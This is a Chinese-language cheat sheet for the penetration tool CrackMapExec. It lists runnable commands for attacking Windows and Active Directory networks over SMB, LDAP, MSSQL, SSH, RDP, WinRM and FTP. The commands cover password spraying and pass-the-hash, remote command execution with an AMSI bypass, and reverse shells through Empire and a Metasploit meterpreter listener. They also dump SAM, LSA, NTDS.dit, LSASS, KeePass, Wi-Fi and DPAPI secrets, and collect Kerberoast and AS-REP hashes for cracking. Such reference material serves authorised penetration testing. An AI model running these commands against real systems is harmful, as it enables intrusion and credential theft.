CrackMapExec命令使用教程
文档:https://wiki.porchetta.industries/
--------------------------------------------------------------------------
下面以 基础、SMB协议、LDAP协议、MSSQL协议、SSH协议、RDP协议、WINRM协议,可参考wiki
搜索xxx协议,可到指定模块。
注意爆破加上--continue-on-success,成功会在结果后面追加(Pwn3d!)或者开头是+号的
--------------------------------------------------------------------------
# 目标可以为:ms.evilcorp.org、192.168.1.0 192.168.0.2 #单个以空格隔开、192.168.1.0/24、192.168.1.0-28 10.0.0.1-67 #指定段、~/targets.txt #文件格式
# 协议有:SMB、LDAP、WINRM、MSSQL、SSH、FTP、RDP
--------------------------------------------------------------------------
配置:
Database:cmedb配置
#~ cmedb
cmedb (default) >
cmedb (default) > workspace create test
[*] Creating workspace 'test'
[*] Initializing HTTP protocol database
[*] Initializing SMB protocol database
[*] Initializing MSSQL protocol database
cmedb (test) >
cmedb (test) > workspace default
cmedb (default) >
cmedb (test) > proto smb
cmedb (test)(smb) >
cmedb (test)(smb) > back
cmedb (test) > proto http
cmedb (test)(http) >
导出数据:
cmedb (test)(smb) > export shares detailed file.csv
BloodHound 配置:
CrackMapExec会在发现账户时将用户设置为BloodHound上的 "拥有"!当lsassy在一次转储中发现20个凭证时非常有用 :)
首先,你需要在你的主文件夹中配置你的配置文件:~/.cme/cme.conf 并添加以下几行:
[BloodHound]
bh_enabled = True
bh_uri = 127.0.0.1
bh_port = 7687
bh_user = user
bh_pass = pass
然后,每当cme找到一个有效的凭证,它就会被添加到bloodhound中。
审计模式:不用管一般
在位于~/.cme/cme.conf的配置文件中,在audit_mode一行添加你选择的字符
如果你不想要审计模式,就把它留空或删除这一行 !
--------------------------------------------------------------------------
基础:
密码爆破:
#~ crackmapexec smb 192.168.1.0/24 -u='-username' -p='-Admin!123@' --continue-on-success # SMB为<protocol> 192.168.1.0/24为<target(s)>
还可以多个指定用户密码:
#~ crackmapexec <protocol> <target(s)> -u username1 -p password1 password2 --continue-on-success
#~ crackmapexec <protocol> <target(s)> -u username1 username2 -p password1 --continue-on-success
#~ crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords --continue-on-success
#~ crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H xxxxxxxxxxxxxxxxxxxxx --continue-on-success # 指定hash爆破
#~ crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --continue-on-success # 指定hash文件爆破
从cmedb中使用凭证ID:
#~ crackmapexec <protocol> <target(s)> -id <cred ID(s)> --continue-on-success
域环境下使用文件爆破域用户密码:
#~ crackmapexec <protocol> <target(s)> -p FILE -u password --continue-on-success #FILE的内容应该为:DOMAIN1\user 这样的格式
不使用暴力的密码喷涂
对于像WinRM和MSSQL这样的协议是有用的。当你使用文件(-u file -p file)时,这个选项可以避免暴力破解。即用户密码文件一对一尝试
#~ crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce --continue-on-success
#~ crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -p ~/file_containing_passwords --no-bruteforce --continue-on-success
默认情况下,CME会在找到一个成功的登录后退出。使用--continue-on-success标志,即使找到了有效的密码,也会继续进行喷洒。对于针对一个大的用户列表喷洒一个密码来说是很有用的。
#~ crackmapexec <protocol> <target(s)> -u ~/file_containing_usernames -H ~/file_containing_ntlm_hashes --no-bruteforce --continue-on-success
--------------------------------------------------------------------------
SMB协议:
枚举HOSTS:
#~ cme smb 192.168.1.0/24 # 目标格式参看基础
枚举空会话:
#~ cme smb 10.10.10.161 -u '' -p ''
#~ cme smb 10.10.10.161 --pass-pol
#~ cme smb 10.10.10.161 --users
#~ cme smb 10.10.10.161 --groups
枚举匿名登录:
#~ cme smb 10.10.10.178 -u 'a' -p '' # 确保用户密码是空的
枚举存活会话:
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sessions
枚举共享和访问:
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --shares --filter-shares READ WRITE # 如果你想只通过可读或可写的共享来过滤
枚举磁盘:
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --disks
枚举已登录用户:
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --loggedon-users
枚举域用户:
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --users
通过暴力破解RID来列举用户:
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --rid-brute
枚举域组:
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --groups
枚举本地组:
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-groups
枚举域密码策略:
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --pass-pol
枚举不需要SMB签名的主机:
#~ cme smb 192.168.1.0/24 --gen-relay-list relaylistOutputFilename.txt # 可在relaylistOutputFilename.txt中查看结果
列举反病毒/EDR:花钱
#~ crackmapexec smb <ip> -u user -p pass -M enum_av
########################################喷洒密码:################################################
使用用户名/密码列表:
#~ cme smb 192.168.1.101 -u user1 user2 user3 -p Summer18 --continue-on-success
#~ cme smb 192.168.1.101 -u user1 -p password1 password2 password3 --continue-on-success
CME接受用户名和密码的txt文件。每行一个用户/密码。注意账户锁定!:
#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18 --continue-on-success
#~ cme smb 192.168.1.101 -u Administrator -p /path/to/passwords.txt --continue-on-success
#~ cme smb 192.168.1.101 -u user.txt -p password.txt --continue-on-success
默认情况下,CME会在找到一个成功的登录后退出。使用--continue-on-success标志,即使发现了有效的密码,也会继续喷射。在对一个大的用户列表进行单一密码的喷洒时很有用:
#~ cme smb 192.168.1.101 -u /path/to/users.txt -p Summer18 --continue-on-success
检查用户名密码字典使用时,一行用户对应一行密码,不进行交叉测试:
#~ cme smb 192.168.1.101 -u user.txt -p password.txt --no-bruteforce --continue-on-succes
########################################检查凭证(域)########################################
#登录失败的结果是[-]。
#成功登录的结果是 [+] Domain/Username:Password
#本地管理员访问的结果是在登录确认后添加一个(Pwn3d!)
使用用户名密码:
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --continue-on-succes
使用用户名HASH:
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT'
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH'
#~ cme smb 192.168.1.0/24 -u Administrator -H '13b29964cc2480b4ef454c59562e675c'
#~ cme smb 192.168.1.0/24 -u Administrator -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c'
########################################检查凭证(本地)########################################
#用户/密码/哈希值
#在任何一个认证命令中添加--local-auth,尝试在本地登录。
#在登录确认后添加一个(Pwn3d!)
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --local-auth
#~ cme smb 192.168.1.0/24 -u '' -p '' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'LM:NT' --local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -H 'NTHASH' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H '13b29964cc2480b4ef454c59562e675c' --local-auth
#~ cme smb 192.168.1.0/24 -u localguy -H 'aad3b435b51404eeaad3b435b51404ee:13b29964cc2480b4ef454c59562e675c' --local-auth
########################################远程命令执行########################################
在windows系统上执行命令需要管理员凭证,CME会自动告诉你,你使用的凭证集是否有主机的管理员权限,当认证成功时,会在输出中附加'(Pwn3d!)'。
CME有三种不同的命令执行方法:
默认情况下,如果有一种执行方式失败,CME会转到另一种执行方式。它试图按照以下顺序执行命令:
1.wmiexec #wmiexec通过WMI执行命令
2.atexec # atexec通过windows任务调度器调度一个任务来执行命令
3.smbexec # smbexec通过创建和运行一个服务来执行命令。
如果你想强迫CME只使用一种执行方法,你可以使用--exec-method标志指定哪一种。
#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami # -x 表示命令
#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable'
绕过AMSI:
#~ crackmapexec 192.168.10.11 -u Administrator -p 'P@ssw0rd' -X '$PSVersionTable' --amsi-bypass /path/payload
########################################获得反弹shell########################################
########方式一:使用新版Empire:https://github.com/BC-SECURITY/Empire
第一步执行命令:python powershell-empire --rest --user empireadmin --pass Password123!
第二步使用Empire生成监听:
(Empire: listeners) > set Name test
(Empire: listeners) > set Host 192.168.10.3
(Empire: listeners) > set Port 9090
(Empire: listeners) > set CertPath data/empire.pem
(Empire: listeners) > run
(Empire: listeners) > list
[*] Active listeners:
ID Name Host Type Delay/Jitter KillDate Redirect Target
-- ---- ---- ------- ------------ -------- ---------------
1 test http://192.168.10.3:9090 native 5/0.0
(Empire: listeners) >
第三步:
CME用来验证Empire的RESTful API的用户名和密码被存储在位于~/.cme/cme.conf的cme.conf文件中:
第四步:
然后只需运行empire_exec模块并指定监听器的名称:
#~ crackmapexec 192.168.10.0/24 -u username -p password -M empire_exec -o LISTENER=test # set的名字
########方式二:使用MSF
use exploit/multi/script/web_delivery
set SRVHOST 10.211.55
set SRVPORT 8443
set target 2
set payload windows/meterpreter/reverse_https
set LHOST 10.211.55
set LPORT 443
run -j
最后:
#~ crackmapexec 192.168.10.0/24 -u username -p password -M met_inject -o SRVHOST=192.168.10.3 SRVPORT=8443 RAND=eYEssEwv2D SSL=http
获得shell
########################################上传下载文件########################################
文件上传:
#~ cme smb 172.16.251.152 -u user -p pass --put-file /tmp/whoami.txt \\Windows\\Temp\\whoami.txt
文件下载:
#~ cme smb 172.16.251.152 -u user -p pass --get-file \\Windows\\Temp\\whoami.txt /tmp/whoami.txt
########################################下载凭证########################################
可用工具:impacket、crackmapmewin
DUMP SAM:
你需要在远程目标上至少有本地管理权限,如果你的用户是本地账户,请使用选项-local-auth
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --sam
DUMP LSA:
需要目标域控制器上的域管理员或本地管理员权限。
#~ cme smb 192.168.1.0/24 -u UserNAme -p 'PASSWORDHERE' --lsa
DUMP NTDS.dit:
需要目标域控制器上的域管理员或本地管理员权限。
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds --users --enabled
#~ cme smb 192.168.1.100 -u UserNAme -p 'PASSWORDHERE' --ntds vss
Dump LSASS:
你需要在远程目标上至少有本地管理权限,如果你的用户是本地账户,请使用选项-local-auth
#~ cme smb 192.168.255.131 -u administrator -p pass -M lsassy
#~ cme smb 192.168.255.131 -u administrator -p pass -M nanodump
#~ cme smb 192.168.255.131 -u administrator -p pass -M mimikatz
#~ cme smb 192.168.255.131 -u Administrator -p pass -M mimikatz -o COMMAND='"lsadump::dcsync /domain:domain.local /user:krbtgt"
Dump WIFI password:
你需要在远程目标上至少有本地管理权限,如果你的用户是本地账户,请使用选项-local-auth
#~ cme smb <ip> -u user -p pass -M wireless
Dump KeePass:
你可以检查目标计算机上是否安装了keepass,然后窃取主密码并解密数据库 !
#~ cme smb <ip> -u user -p pass -M keepass_discover
#~ cme smb <ip> -u user -p pass -M keepass_trigger -o KEEPASS_CONFIG_PATH="path_from_module_discovery"
Dump DPAPI:
你需要在远程目标上至少有本地管理权限,如果你的用户是本地账户,请使用选项-local-auth
#~ cme smb <ip> -u user -p password --dpapi
########################################Defeating LAPS########################################
在域上安装LAPS时使用CrackMapExec
如果在域内使用LAPS,那么使用CrackMapExec在域内的每台计算机上执行命令可能会很困难。
因此,增加了一个新的核心选项--laps !如果你已经入侵了一个可以读取LAPS密码的账户,你可以像这样使用CrackMapExec
#~ cme smb <ip> -u user-can-read-laps -p pass --laps
--------------------------------------------------------------------------
域控:LDAP协议
########################################LDAP Authentication########################################
#~ cme ldap 192.168.1.0/24 -u users.txt -p '' -k #测试账户是否存在,而不需要kerberos协议
测试证书:成功,就是有+
#~ cme ldap 192.168.1.0/24 -u user -p password
#~ cme ldap 192.168.1.0/24 -u user -H A29F7623FD11550DEF0192DE9246F46B
########################################ASREPRoast########################################
如果你有一个域上的用户列表,你可以检索用户的Kerberos 5 AS-REP etype 23哈希值,而不需要Kerberos预认证
无认证:ASREPRoast攻击寻找不需要Kerberos预认证的用户。这意味着任何人都可以代表任何这些用户向 KDC 发送 AS_REQ 请求,并收到 AS_REP 消息。这最后一种消息包含一个用原始用户密钥加密的数据块,该密钥来自其密码。然后,通过使用这个消息,用户密码可以被离线破解。
#~ cme ldap 192.168.0.104 -u harry -p '' --asreproast output.txt
使用词表,你可以在这里找到用户名的词表
#~ cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
有认证:如果你在域上有一个有效的凭证,你可以检索所有不需要Kerberos预认证的用户和哈希。
#~ cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt
当域名解析失败时,使用选项kdcHost:
#~ cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt --kdcHost domain_name
用hashcat破解output.txt文件的哈希值:hashcat -m18200 output.txt wordlist
########################################找域的SID########################################
#~ crackmapexec ldap DC1.scrm.local -u sqlsvc -p Pegasus60 -k --get-sid
########################################Kerberoasting########################################
您可以使用 Kerberoasting 技术检索 Kerberos 5 TGS-REP etype 23 哈希值
Kerberoasting的目的是为代表AD中的用户账户而不是计算机账户运行的服务收获TGS票。因此,这些TGS票的一部分是用来自用户密码的密钥进行加密的。因此,他们的凭证可以被离线破解。更多细节见Kerberos理论。
前提:要完成这一攻击,你需要一个在域名上的账户
#~ cme ldap 192.168.0.104 -u harry -p pass --kerberoasting output.txt
破解hash:hashcat -m13100 output.txt wordlist.txt
########################################不受约束的授权########################################
CrackMapExec允许你检索所有具有TRUSTED_FOR_DELEGATION标志的计算机和用户的列表。
#~ cme ldap 192.168.0.104 -u harry -p pass --trusted-for-delegation
########################################管理员人数########################################
adminCount 表示一个给定的对象由于是某个管理组的成员(直接或过境),其ACL已经被系统改变为更安全的值。
#~ cme ldap 192.168.255.131 -u adm -p pass --admin-count
########################################Machine Account Quota########################################
这个模块检索MachineAccountQuota域级属性。检查这个值很有用,因为默认情况下,它允许无特权的用户在一个活动目录(AD)域中最多附加10台计算机。
cme ldap <ip> -u user -p pass -M maq
########################################获取用户描述########################################
新的LDAP模块,在用户描述中寻找密码。
有三个选项可用:
FILTER: 在描述中寻找一个字符串
passwordpolicy:根据windows的复杂性要求寻找密码。
MINLENGTH: 选择密码的最小长度(可以从-pass-pol中获得)。
#~ cme ldap 192.168.255.131 -u adm -p pass --kdcHost 192.168.255.130 -M get-desc-users
########################################Dump gMSA########################################
使用LDAP协议,如果你有权利,你可以提取gMSA账户的密码。
检索密码需要LDAPS,使用--gmsa LDAPS会自动选择
#~ poetry run crackmapexec ldap <ip> -u <user> -p <pass> --gmsa
########################################攻击ESC8 (adcs)########################################
列出所有PKI注册服务器:
#~ poetry run crackmapexec run ldap <ip> -u user -p pass -M adcs
列出一个PKI内的所有证书:
#~ poetry run crackmapexec run ldap <ip> -u user -p pass -M adcs -o SERVER=xxxx
########################################提取子网########################################
#~ poetry run crackmapexec ldap <ip> -u <user> -p <pass> -M get-network
#~ poetry run crackmapexec ldap <ip> -u <user> -p <pass> -M get-network -o ONLY_HOSTS=true
#~ poetry run crackmapexec ldap <ip> -u <user> -p <pass> -M get-network -o ALL=true
########################################检查LDAP签名########################################
#~ crackmapexec ldap <ip> -u user -p pass -M ldap-checker
########################################读取DACL的权利########################################
LDAP模块,允许读取和输出一个或多个对象的DACL !
读取管理员的所有ACEs
#~ poetry run crackmapexec ldap lab-dc.lab.local -k --kdcHost lab-dc.lab.local -M daclread -o TARGET=Administrator ACTION=read
读取BlWasp用户对管理员的所有权利
#~ poetry run crackmapexec ldap lab-dc.lab.local -k --kdcHost lab-dc.lab.local -M daclread -o TARGET=Administrator ACTION=read PRINCIPAL=BlWasp
读取域上所有具有DCSync权限的委托人的信息
#~ poetry run crackmapexec ldap lab-dc.lab.local -k --kdcHost lab-dc.lab.local -M daclread -o TARGET_DN="DC=lab,DC=LOCAL" ACTION=read RIGHTS=DCSync
也许有一个被拒绝的ACE存在?
#~ poetry run crackmapexec ldap lab-dc.lab.local -k --kdcHost lab-dc.lab.local -M daclread -o TARGET=Administrator ACTION=read ACE_TYPE=denied
备份多个目标的DACL
#~ poetry run crackmapexec ldap lab-dc.lab.local -k --kdcHost lab-dc.lab.local -M daclread -o TARGET=../../targets.txt ACTION=backup
########################################提取gMSA的凭证########################################
当你在LSA中发现一个gmsa账户时,CrackMapExec提供多种选择
crackmapexec ldap <ip> -u <user> -p <pass> --gmsa-convert-id 313e25a880eb773502f03ad5021f49c2eb5b5be2a09f9883ae0d83308dbfa724
cackmapexec ldap <ip> -u <user> -p <pass> --gmsa-decrypt-lsa '_SC_GMSA_{84A78B8C-56EE-465b-8496-FFB35A1B52A7}_313e25a880eb773502f03ad5021f49c2eb5b5be2a09f9883ae0d83308dbfa724:01000000240200001000120114021c02fbb096d10991bb88c3f54e153807b4c1cc009d30bc3c50fd6f72c99a1e79f27bd0cbd4df69fdf08b5cf6fa7928cf6924cf55bfd8dd505b1da26ddf5695f5333dd07d08673029b01082e548e31f1ad16c67db0116c6ab0f8d2a0f6f36ff30b160b7c78502d5df93232f72d6397b44571d1939a2d18bb9c28a5a48266f52737c934669e038e22d3ba5a7ae63a608f3074c520201f372d740fddec77a8fed4ddfc5b63ce7c4643b60a8c4c739e0d0c7078dd0c2fcbc2849e561ea2de1af7a004b462b1ff62ab4d3db5945a6227a58ed24461a634b85f939eeed392cf3fe9359f28f3daa8cb74edb9eef7dd38f44ed99fa7df5d10ea1545994012850980a7b3becba0000d22d957218fb7297b216e2d7272a4901f65c93ee0dbc4891d4eba49dda5354b0f2c359f185e6bb943da9bcfbd2abda591299cf166c28cb36907d1ba1a8956004b5e872ef851810689cec9578baae261b45d29d99aef743f3d9dcfbc5f89172c9761c706ea3ef16f4b553db628010e627dd42e3717208da1a2902636d63dabf1526597d94307c6b70a5acaf4bb2a1bdab05e38eb2594018e3ffac0245fcdb6afc5a36a5f98f5910491e85669f45d02e230cb633a4e64368205ac6fc3b0ba62d516283623670b723f906c2b3d40027791ab2ae97a8c5c135aae85da54a970e77fb46087d0e2233d062dcd88f866c12160313f9e6884b510840e90f4c5ee5a032d40000f0650a4489170000f0073a9188170000'
########################################Bloodhound Ingestor########################################
摄取活动目录的数据:
crackmapexec ldap <ip> -u user -p pass --bloodhound --ns ip --collection All
--------------------------------------------------------------------------
SSH协议:
密码喷洒:
#~ cme ssh 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
用户密码测试:
#~ cme ssh 192.168.1.0/24 -u user -p password
指定端口:
#~ cme http 192.168.1.0/24 --port 2222
命令执行:
#~ cme ssh 127.0.0.1 -u user -p password -x whoami
--------------------------------------------------------------------------
RDP协议:
密码喷洒:kaili中poetry
#~ poetry run crackmapexec rdp 192.168.1.0/24 -u user -p password
#~ poetry run crackmapexec rdp 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
#~ poetry run crackmapexec rdp 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
屏幕截图(已连接):
#~ cme rdp <ip> -u <user> -p <password> --screenshot --screentime <second>
--------------------------------------------------------------------------
MSSQL协议:
密码喷洒:
#~ cme mssql 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
测试凭证:
你可以使用两种方法来认证MSSQL:windows或本地(默认:windows)。要使用本地认证,请添加以下标志 --local-auth
Windows auth:
SMB端口开放
#~ cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!'
SMB端口关闭,指定-d 域名
#~ cme mssql 10.10.10.52 -u james -p 'J@m3s_P@ssW0rd!' -d HTB
Local auth:
#~ cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth
指定端口:
#~ cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --port 1434
提权:user到DBA
#~ cme mssql <ip> -u user -p password -M mssql_priv
Sql语句命令执行:
#~ cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --local-auth -q 'SELECT name FROM master.dbo.sysdatabases;'
文件上传:
#~ cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --put-file --put-file /tmp/users C:\\Windows\\Temp\\whoami.txt
文件下载:
#~ cme mssql 10.10.10.52 -u admin -p 'm$$ql_S@_P@ssW0rd!' --get-file C:\\Windows\\Temp\\whoami.txt /tmp/file
windows命令执行:
使用xp_cmdshell执行命令:
#~ cme mssql 10.10.10.59 -u sa -p 'GWE3V65#6KFH93@4GWTG2G' --local-auth -x whoami
--------------------------------------------------------------------------
WINRM协议:
密码喷洒:
#~ cme winrm 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
身份验证:
#~ cme winrm 192.168.1.0/24 -u user -p password
#~ cme winrm 192.168.1.0/24 -u user -p password -d DOMAIN # 目标是域用户请指定域名
命令执行:
#~ cme winrm 192.168.255.131 -u user -p 'password' -X whoami
Defeating LAPS:
#~ crackmapexec winrm <ip> -u user-can-read-laps -p pass --laps
--------------------------------------------------------------------------
FTP协议:
密码喷洒:
#~ cme ftp 192.168.1.0/24 -u userfile -p passwordfile --no-bruteforce
--------------------------------------------------------------------------